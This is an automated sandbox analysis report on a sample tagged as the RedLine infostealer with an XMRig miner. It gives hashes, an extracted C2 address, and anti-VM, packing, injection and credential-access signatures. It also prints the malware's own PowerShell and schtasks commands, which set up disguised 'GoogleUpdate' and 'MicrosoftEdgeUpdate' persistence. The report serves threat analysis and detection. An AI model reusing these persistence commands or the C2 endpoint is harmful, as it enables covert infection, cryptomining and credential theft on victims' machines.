redline | 669e1697823eb434f2004523e648735a41ec9044e3ca8a34a055268e0ffaf45b

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
06-10-2022 09:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a8ca391420619d51b69cdecd69de91f7.exe
Size

8.0MB
MD5

a8ca391420619d51b69cdecd69de91f7
SHA1

df53d79107c81f47f9244bd81f06d526bf6575ea
SHA256

669e1697823eb434f2004523e648735a41ec9044e3ca8a34a055268e0ffaf45b
SHA512

8ad3ce8701f19a9bbaa84fadd25b2b314772114b4f9635f59f4112e79fa27fdd9b24a392e8a7aa215fbfee57d4013522c7ac71af2b53be94d0977ae499a17e86
SSDEEP

196608:4JNLHNhcPQJ/HmZfovBFRuICGJrbJy3PoypzYS34dZ67YgqgP8:mHJOJirRubG9M/pYS34dZePE

Score

10^/10

redline xmrig evasion infostealer miner spyware themida trojan upx vmprotect

Malware Config

Extracted

Family

redline

185.215.113.69:15544

Attributes

auth_value
1372cd9fae57c6645ea8737ff631eb3c

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/88640-155-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

Setup.exeupdater.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Setup.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/1220-211-0x00007FF60B150000-0x00007FF60B944000-memory.dmp	xmrig
behavioral2/memory/1220-212-0x00007FF60B150000-0x00007FF60B944000-memory.dmp	xmrig

Executes dropped EXE 4 IoCs

Processes:

Setup.exeWinDefenderUpdater.exeUpdater.exeupdater.exe

pid process

4548 Setup.exe
2184 WinDefenderUpdater.exe
2240 Updater.exe
2884 updater.exe

pid	process
4548	Setup.exe
2184	WinDefenderUpdater.exe
2240	Updater.exe
2884	updater.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/1220-211-0x00007FF60B150000-0x00007FF60B944000-memory.dmp	upx
behavioral2/memory/1220-212-0x00007FF60B150000-0x00007FF60B944000-memory.dmp	upx

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Updater.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\Updater.exe	vmprotect
behavioral2/memory/2240-140-0x00000000002B0000-0x0000000000326000-memory.dmp	vmprotect

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Setup.exeupdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

a8ca391420619d51b69cdecd69de91f7.exeUpdater.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	a8ca391420619d51b69cdecd69de91f7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	Updater.exe

Themida packer 21 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Setup.exe	themida
C:\Users\Admin\AppData\Local\Temp\Setup.exe	themida
behavioral2/memory/4548-143-0x00007FF72EC90000-0x00007FF72F937000-memory.dmp	themida
behavioral2/memory/4548-144-0x00007FF72EC90000-0x00007FF72F937000-memory.dmp	themida
behavioral2/memory/4548-146-0x00007FF72EC90000-0x00007FF72F937000-memory.dmp	themida
behavioral2/memory/4548-148-0x00007FF72EC90000-0x00007FF72F937000-memory.dmp	themida
behavioral2/memory/4548-149-0x00007FF72EC90000-0x00007FF72F937000-memory.dmp	themida
behavioral2/memory/4548-150-0x00007FF72EC90000-0x00007FF72F937000-memory.dmp	themida
behavioral2/memory/4548-151-0x00007FF72EC90000-0x00007FF72F937000-memory.dmp	themida
behavioral2/memory/4548-164-0x00007FF72EC90000-0x00007FF72F937000-memory.dmp	themida
behavioral2/memory/4548-177-0x00007FF72EC90000-0x00007FF72F937000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe	themida
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe	themida
behavioral2/memory/2884-189-0x00007FF7B6A40000-0x00007FF7B76E7000-memory.dmp	themida
behavioral2/memory/2884-191-0x00007FF7B6A40000-0x00007FF7B76E7000-memory.dmp	themida
behavioral2/memory/2884-192-0x00007FF7B6A40000-0x00007FF7B76E7000-memory.dmp	themida
behavioral2/memory/2884-193-0x00007FF7B6A40000-0x00007FF7B76E7000-memory.dmp	themida
behavioral2/memory/2884-194-0x00007FF7B6A40000-0x00007FF7B76E7000-memory.dmp	themida
behavioral2/memory/2884-195-0x00007FF7B6A40000-0x00007FF7B76E7000-memory.dmp	themida
behavioral2/memory/2884-196-0x00007FF7B6A40000-0x00007FF7B76E7000-memory.dmp	themida
behavioral2/memory/2884-208-0x00007FF7B6A40000-0x00007FF7B76E7000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

updater.exeSetup.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Setup.exe

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

18 api.ipify.org
19 api.ipify.org
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

Setup.exeupdater.exe

pid process

4548 Setup.exe
2884 updater.exe

flow	ioc
18	api.ipify.org
19	api.ipify.org

pid	process
4548	Setup.exe
2884	updater.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

WinDefenderUpdater.exeupdater.exe

description	pid	process	target process
PID 2184 set thread context of 88640	2184	WinDefenderUpdater.exe	AppLaunch.exe
PID 2884 set thread context of 2388	2884	updater.exe	conhost.exe
PID 2884 set thread context of 1220	2884	updater.exe	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

43916 schtasks.exe

pid	process
43916	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Updater.exepowershell.exeAppLaunch.exepowershell.exepowershell.exesvchost.exe

pid	process
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
2240	Updater.exe
4572	powershell.exe
4572	powershell.exe
88640	AppLaunch.exe
4140	powershell.exe
4140	powershell.exe
4612	powershell.exe
4612	powershell.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Updater.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2240	Updater.exe
Token: SeDebugPrivilege	4572	powershell.exe
Token: SeIncreaseQuotaPrivilege	4572	powershell.exe
Token: SeSecurityPrivilege	4572	powershell.exe
Token: SeTakeOwnershipPrivilege	4572	powershell.exe
Token: SeLoadDriverPrivilege	4572	powershell.exe
Token: SeSystemProfilePrivilege	4572	powershell.exe
Token: SeSystemtimePrivilege	4572	powershell.exe
Token: SeProfSingleProcessPrivilege	4572	powershell.exe
Token: SeIncBasePriorityPrivilege	4572	powershell.exe
Token: SeCreatePagefilePrivilege	4572	powershell.exe
Token: SeBackupPrivilege	4572	powershell.exe
Token: SeRestorePrivilege	4572	powershell.exe
Token: SeShutdownPrivilege	4572	powershell.exe
Token: SeDebugPrivilege	4572	powershell.exe
Token: SeSystemEnvironmentPrivilege	4572	powershell.exe
Token: SeRemoteShutdownPrivilege	4572	powershell.exe
Token: SeUndockPrivilege	4572	powershell.exe
Token: SeManageVolumePrivilege	4572	powershell.exe
Token: 33	4572	powershell.exe
Token: 34	4572	powershell.exe
Token: 35	4572	powershell.exe
Token: 36	4572	powershell.exe
Token: SeIncreaseQuotaPrivilege	4572	powershell.exe
Token: SeSecurityPrivilege	4572	powershell.exe
Token: SeTakeOwnershipPrivilege	4572	powershell.exe
Token: SeLoadDriverPrivilege	4572	powershell.exe
Token: SeSystemProfilePrivilege	4572	powershell.exe
Token: SeSystemtimePrivilege	4572	powershell.exe
Token: SeProfSingleProcessPrivilege	4572	powershell.exe
Token: SeIncBasePriorityPrivilege	4572	powershell.exe
Token: SeCreatePagefilePrivilege	4572	powershell.exe
Token: SeBackupPrivilege	4572	powershell.exe
Token: SeRestorePrivilege	4572	powershell.exe
Token: SeShutdownPrivilege	4572	powershell.exe
Token: SeDebugPrivilege	4572	powershell.exe
Token: SeSystemEnvironmentPrivilege	4572	powershell.exe
Token: SeRemoteShutdownPrivilege	4572	powershell.exe
Token: SeUndockPrivilege	4572	powershell.exe
Token: SeManageVolumePrivilege	4572	powershell.exe
Token: 33	4572	powershell.exe
Token: 34	4572	powershell.exe
Token: 35	4572	powershell.exe
Token: 36	4572	powershell.exe
Token: SeIncreaseQuotaPrivilege	4572	powershell.exe
Token: SeSecurityPrivilege	4572	powershell.exe
Token: SeTakeOwnershipPrivilege	4572	powershell.exe
Token: SeLoadDriverPrivilege	4572	powershell.exe
Token: SeSystemProfilePrivilege	4572	powershell.exe
Token: SeSystemtimePrivilege	4572	powershell.exe
Token: SeProfSingleProcessPrivilege	4572	powershell.exe
Token: SeIncBasePriorityPrivilege	4572	powershell.exe
Token: SeCreatePagefilePrivilege	4572	powershell.exe
Token: SeBackupPrivilege	4572	powershell.exe
Token: SeRestorePrivilege	4572	powershell.exe
Token: SeShutdownPrivilege	4572	powershell.exe
Token: SeDebugPrivilege	4572	powershell.exe
Token: SeSystemEnvironmentPrivilege	4572	powershell.exe
Token: SeRemoteShutdownPrivilege	4572	powershell.exe
Token: SeUndockPrivilege	4572	powershell.exe
Token: SeManageVolumePrivilege	4572	powershell.exe
Token: 33	4572	powershell.exe
Token: 34	4572	powershell.exe
Token: 35	4572	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

svchost.exe

pid	process
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

svchost.exe

pid	process
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe
1220	svchost.exe

Suspicious use of WriteProcessMemory 34 IoCs

Processes:

a8ca391420619d51b69cdecd69de91f7.exeUpdater.exeWinDefenderUpdater.exeSetup.exepowershell.exeupdater.execonhost.execmd.exe

description	pid	process	target process
PID 4904 wrote to memory of 4548	4904	a8ca391420619d51b69cdecd69de91f7.exe	Setup.exe
PID 4904 wrote to memory of 4548	4904	a8ca391420619d51b69cdecd69de91f7.exe	Setup.exe
PID 4904 wrote to memory of 2184	4904	a8ca391420619d51b69cdecd69de91f7.exe	WinDefenderUpdater.exe
PID 4904 wrote to memory of 2184	4904	a8ca391420619d51b69cdecd69de91f7.exe	WinDefenderUpdater.exe
PID 4904 wrote to memory of 2184	4904	a8ca391420619d51b69cdecd69de91f7.exe	WinDefenderUpdater.exe
PID 4904 wrote to memory of 2240	4904	a8ca391420619d51b69cdecd69de91f7.exe	Updater.exe
PID 4904 wrote to memory of 2240	4904	a8ca391420619d51b69cdecd69de91f7.exe	Updater.exe
PID 2240 wrote to memory of 43916	2240	Updater.exe	schtasks.exe
PID 2240 wrote to memory of 43916	2240	Updater.exe	schtasks.exe
PID 2184 wrote to memory of 88640	2184	WinDefenderUpdater.exe	AppLaunch.exe
PID 2184 wrote to memory of 88640	2184	WinDefenderUpdater.exe	AppLaunch.exe
PID 2184 wrote to memory of 88640	2184	WinDefenderUpdater.exe	AppLaunch.exe
PID 2184 wrote to memory of 88640	2184	WinDefenderUpdater.exe	AppLaunch.exe
PID 2184 wrote to memory of 88640	2184	WinDefenderUpdater.exe	AppLaunch.exe
PID 4548 wrote to memory of 4572	4548	Setup.exe	powershell.exe
PID 4548 wrote to memory of 4572	4548	Setup.exe	powershell.exe
PID 4548 wrote to memory of 4140	4548	Setup.exe	powershell.exe
PID 4548 wrote to memory of 4140	4548	Setup.exe	powershell.exe
PID 4140 wrote to memory of 3256	4140	powershell.exe	schtasks.exe
PID 4140 wrote to memory of 3256	4140	powershell.exe	schtasks.exe
PID 2884 wrote to memory of 4612	2884	updater.exe	powershell.exe
PID 2884 wrote to memory of 4612	2884	updater.exe	powershell.exe
PID 2884 wrote to memory of 2388	2884	updater.exe	conhost.exe
PID 2884 wrote to memory of 2388	2884	updater.exe	conhost.exe
PID 2884 wrote to memory of 2388	2884	updater.exe	conhost.exe
PID 2884 wrote to memory of 1552	2884	updater.exe	cmd.exe
PID 2884 wrote to memory of 1552	2884	updater.exe	cmd.exe
PID 2388 wrote to memory of 4748	2388	conhost.exe	cmd.exe
PID 2388 wrote to memory of 4748	2388	conhost.exe	cmd.exe
PID 4748 wrote to memory of 376	4748	cmd.exe	WMIC.exe
PID 4748 wrote to memory of 376	4748	cmd.exe	WMIC.exe
PID 2884 wrote to memory of 1220	2884	updater.exe	svchost.exe
PID 2884 wrote to memory of 1220	2884	updater.exe	svchost.exe
PID 2884 wrote to memory of 1220	2884	updater.exe	svchost.exe

C:\Users\Admin\AppData\Local\Temp\a8ca391420619d51b69cdecd69de91f7.exe
"C:\Users\Admin\AppData\Local\Temp\a8ca391420619d51b69cdecd69de91f7.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4904

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:4548

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#yodokpfwe#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#krdpmezpo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4140

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
4⤵
PID:3256

C:\Users\Admin\AppData\Local\Temp\WinDefenderUpdater.exe
"C:\Users\Admin\AppData\Local\Temp\WinDefenderUpdater.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2184

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:88640

C:\Users\Admin\AppData\Local\Temp\Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Updater.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2240

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 3 /tn "MicrosoftEdgeUpdate" /tr "C:\Users\Admin\AppData\Roaming\Updaterx.exe\Updater,exe.exe" /f
3⤵
- Creates scheduled task(s)
PID:43916

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:88952

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#yodokpfwe#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4612

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe xcntavhndiimtz
2⤵
- Suspicious use of WriteProcessMemory
PID:2388

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
3⤵
- Suspicious use of WriteProcessMemory
PID:4748

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
4⤵
PID:376

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
2⤵
PID:1552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe kjyytlcxpfuxqnbv 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPrqBymCm+Z5ixc+hig85/4xzrcYceFHd4j0OBxFoiH0w2I3xdoGmQnmzbM5au/RYBQdUB+LCtFQUO3qxWLPJvscrmn9DH5gqtJ+xzyJ2pEn9z16cyWe1k359t91uWH0xQkG6db+ji/OgssDUEZ8hXGEWX7wbkYLXyTyl9pBgDvjdhkWT6mYPzAjaXfsk1vfF7a1MYXsKD0gZrx9wha1xOnPJym0QIRPzQcnSND10bhLDVygSUUG9g9EQb8XLayvsM+kHwWGJeClkojWx5sQ0B8Obgc3Ajws1HRJNdTPzNw/YYSGjYO+K0lNanFJvGzusY1GGOj41dCK6OrvTHTF9iZ37s0XLapfsZ1wf3tFNSVU7HslCNhnYARJlkaiRogvdxlIDXTlQYx3zE04kBHExyk0mU1OFBjGqIOM37t4AOuE3y07HUA4i7uagypHrQheJO6DyV4E5isgYtW9iwBCIuE4kCVqf0prMPglstZoz3FnZerc3iFYHu6FDmpalff10xk=
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1220

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
00e7da020005370a518c26d5deb40691

SHA1
389b34fdb01997f1de74a5a2be0ff656280c0432

SHA256
a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe

SHA512
9a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
86989789cd2f4ad01ae20066f963ce92

SHA1
358eae494283723a11a63521cd5f04d9a980541c

SHA256
e675f5bc8913a60639c8e666e2a9f973866d7d7ed3b8fa465334b5d34d37de82

SHA512
9d8e4fd8aa5aef34738998de45d0855b08d0f659d838b14f88ff481fb33f882bf7060f439c4ffc284232763d3bfd159ebeff37f3a46af5be6d989b04c46ebdde

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
055cd1930e45c3d77aa744d53bcc29d9

SHA1
af1464daf329f36930b71fb33119c61a13472b6d

SHA256
fcd4a469c653f6bd319b201326633c2183a70184bc159c071915a9c4abd92d3c

SHA512
00ee038f281f34c7d727b7d6d7734bdfc61ee742b33edc5f905adae6afa949b9a9da8c575d949e98b24b59005e469628e99f113e0fc612dc24bbba7f098fa65d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Setup.exe
Filesize
7.0MB

MD5
33303879b30d7f28dcdf091642f57568

SHA1
409c6d577cef0447a71c714cdaacbbe4ae76d379

SHA256
9a41c8ce89ec0d6a09d2f383097efe375882cab9eb418360c2a6bc4db57ff95b

SHA512
633d0a8ddfbab8d725a93ecb436201ac43d83a861174b844779d3d06ed5273647ade9cc097f53cfb6bdf8089c4f843373e3c6fa10a25de24aa65b7469798db3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Setup.exe
Filesize
7.0MB

MD5
33303879b30d7f28dcdf091642f57568

SHA1
409c6d577cef0447a71c714cdaacbbe4ae76d379

SHA256
9a41c8ce89ec0d6a09d2f383097efe375882cab9eb418360c2a6bc4db57ff95b

SHA512
633d0a8ddfbab8d725a93ecb436201ac43d83a861174b844779d3d06ed5273647ade9cc097f53cfb6bdf8089c4f843373e3c6fa10a25de24aa65b7469798db3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Updater.exe
Filesize
275KB

MD5
a69eb2e41c9d3d8783d307cda98f612d

SHA1
394b19629a71cac603e378d12ba037ffce12074c

SHA256
70b566861ca2286cd90d939661abcd6864f239b7ad4e4f765a45a26c3dc7dc50

SHA512
f56d3d11fef4468fe5ed53743391c957cdacb50c2248402ba243035a602ebf7a5287a5e7d0343835955e281c405b3816901c074791abac4d2158b778c66756c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Updater.exe
Filesize
275KB

MD5
a69eb2e41c9d3d8783d307cda98f612d

SHA1
394b19629a71cac603e378d12ba037ffce12074c

SHA256
70b566861ca2286cd90d939661abcd6864f239b7ad4e4f765a45a26c3dc7dc50

SHA512
f56d3d11fef4468fe5ed53743391c957cdacb50c2248402ba243035a602ebf7a5287a5e7d0343835955e281c405b3816901c074791abac4d2158b778c66756c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\WinDefenderUpdater.exe
Filesize
2.5MB

MD5
42cb921e726d99dd48588d9782f3eb0f

SHA1
d6c46db0c9a2f2b65ad4113c4ee388837c15da4f

SHA256
